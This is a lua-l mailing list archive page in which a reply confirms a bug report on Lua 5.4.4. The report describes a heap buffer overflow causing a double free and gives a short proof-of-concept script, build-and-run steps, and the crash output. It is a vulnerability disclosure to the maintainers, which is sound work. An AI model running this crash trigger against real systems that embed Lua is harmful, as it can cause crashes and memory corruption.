lua-users home
lua-l archive

[Date Prev][Date Next][Thread Prev][Thread Next] [Date Index] [Thread Index]


Can reproduce with Ubuntu 18.04 and bleeding edge Arch set-up.

On Fri, May 13, 2022 at 1:09 PM Jinwei Dong <jwdong2000@qq.com> wrote:
>
> Hello,
>
>
>
> I found a heap buffer overflow which can cause a heap double free error.
>
>
>
> Lua version: Lua 5.4.4  Copyright (C) 1994-2022 Lua.org, PUC-Rio
>
> Latest commit: 8426d9b4d4df1da3c5b2d759e509ae1c50a86667
>
>
>
> Platform: Ubuntu-20.04 x86_64
>
> Glibc version: GLIBC 2.31-0ubuntu9.9
>
>
>
> POC:
>
> ---------------
>
> #poc.lua
>
> print(
>
>     xpcall((0),
>
>         function(...)
>
>             local f
>
>             if d[print(print(print(print(t[...]))))] then
>
>             end
>
>         end
>
>     )
>
> )
>
> ---------------
>
>
>
> How to reprocude:
>
> ---------------
>
> 1. git clone https://github.com/lua/lua
>
> 2. cd lua && make
>
> 3. ./lua ./poc.lua
>
> ---------------
>
>
>
> Error message:
>
> ---------------
>
> double free or corruption (!prev)
>
> [1]    49704 abort (core dumped)  ./lua ./poc.lua
>
> ---------------
>
>
>
> Address Sanitizer log: see **attachment.txt**
>
>
>
> I apologise for putting the asan's logs directly into the body of the email in the previous mail which made the body too large to view, I have now put it into an attachment file
>
>
>
> And the stack backtrace is recursive, so this could be an error that occurs during some recursive processes.
>
>
>
> Found by: Jinwei Dong